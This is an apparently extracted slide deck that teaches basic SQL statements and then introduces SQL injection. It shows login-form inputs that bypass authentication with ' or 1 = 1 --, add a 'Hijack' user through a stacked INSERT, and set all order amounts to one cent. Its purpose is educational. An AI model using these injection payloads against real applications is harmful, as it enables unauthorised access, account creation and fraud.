SQL INJECTIONHow to Hack a Database

Overview

What is SQL? Database Basics SQL Insert Basics SQL Select Basics SQL Where Basics SQL AND & OR Basics SQL Update Basics SQL Delete Basics SQL Injection Basics

SQL – What Is It?

Basic Database Functions Structured Query Language Common Language For Varity of

Databases ANSI Standard Database Specific Extensions Uses Common Baseline Syntax Scripting Language Allows Comments (--) Semicolon Terminates Command (;)

SQL – What Is It?

Pros: Very Flexible Universal (Oracle, SQL Server, MySQL) Relatively Few Commands to Learn

Cons: Requires Detailed Knowledge of the Structure

of the Database Can Provide Misleading Results

Database Basics

Four Basic Operations CRUD

C – Create (Insert) R – Read (Select) U – Update D – Delete

SQL Basics – Insert

INSERT – Allows Data to be Inserted into Database

Three Basic Components Table Column(s) Values

SQL Basics – Insert

Syntax INSERT INTO table (column(s)) VALUES

(value(s)) Table – Name of Table Data is Being Stored In Column(s) – Name of Column, or Columns, to

Insert Data Into Value(s) – Values to Insert

Note: Columns and Values Must be in Same Order

SQL Basics - Select

Select – Select Data from Database Syntax

SELECT column(s) FROM table WHERE condition Column(s) – Column, or Columns, Names

to Retrieve “*” – Means All Columns from table

Table – Table Name to Get Data From Can be more than one table

SQL Basics - Select

Example Select state_name, state_abbr FROM states Select * FROM agencies

SQL Basics - Where

Where Clause Added to Refine Result Set Uses Conditional Operators

=,>,>=,<,<=,!=(<>) Between x AND y IN (list) LIKE ‘%string’ (“%” us a wild-card) IS NULL NOT {BETWEEN / IN / LIKE / NULL}

SQL Basics - Where

Examples SELECT * FROM annual_summaries WHERE

sd_duration_code = ‘1’ SELECT state_name FROM states WHERE

state_population > 15000000 SELECT * FROM annual_summaries WHERE

sd_duration_code IN (‘1’,’W’,’X’) AND annual_summary_year = 2000

SQL Basics – AND & OR

Multiple WHERE conditions are Linked by AND / OR Statements

“AND” – All Conditions True “OR” – At Least One Condition is TRUE Group with ()

SQL Basics - Update

Allows Changes to Row(s) of Data in a Table

Three Basic Parts Name of Table to Update Column Name to Update Value to Update

Can Update More Than One Column at a Time

Can Include Where Clause to More Refined Update

SQL Basics - Update

Syntax UPDATE table SET column = value WHERE

column = value Example

UPDATE clubs SET ClubName = ‘Club 1’ WHERE ClubID = 1

SQL Basics – Delete

Allows for Data to be Removed from the Database

One Required Part Table Name Can Delete All Data in Table, or Just Selected

Data One Optional Part

WHERE Clause – Allows for Selective Delete

SQL Basics – Delete

Syntax DELETE FROM table WHERE column = value

Table – Name of Table to Remove Data from Column – Name of Column in Table Value – Value that is in the Column

Example DELETE FROM clubs (Deletes all Data in Table) DELETE FROM clubs WHERE ClubID = 1

SQL Injection Basics

SQL Takes Advantage of Poor Programming

Inserting SQL Commands into Input Field for Exploitation

Example User Name / Password Input (admin, admin) Into SQL: SELECT * FROM users WHERE username =

‘admin’ AND password = ‘admin’ Returns Data for User admin Where Password

is admin

SQL Injection Basics

SQL Injection Input (admin, ‘ or 1 = 1 --) SELECT * FROM users WHERE username =

‘admin’ AND password = ‘’ or 1 = 1 -- Returns Data for User admin Where Password

is Empty OR 1 = 1 (Always True) Note: This will Return All Data in Table

SQL Injection Basics

Can Create New User Using Same User Name / Password Example Input (admin, ’;INSERT INTO Users VALUES

('Hijack','This') -- SQL

SELECT * FROM users WHERE username = ‘admin’ AND password = ’’;INSERT INTO Users VALUES ('Hijack','This') --

Note: Creates a New User (Hijack) with a Password (This)

SQL Injection Basics

Can Create Table Values Using Same User Name / Password Example Input (admin, ’;UPDATE Orders Set

Amount=0.01-- SQL

SELECT * FROM users WHERE username = ‘admin’ AND password = ’’;UPDATE Orders Set Amount=0.01--

Note: Sets all Order Amounts to one cent

References

SQL http://w3schools.com/sql/sql_syntax.asp http://www.teach-ict.com/as_as_computing/ocr

/H447/F453/3_3_9/sqlintro/miniweb/index.htm SQL Injection

http://zerofreak.blogspot.com/2012/01/chapter2-basic-sql-injection-with-login.html

Practice Site http://google-gruyere.appspot.com/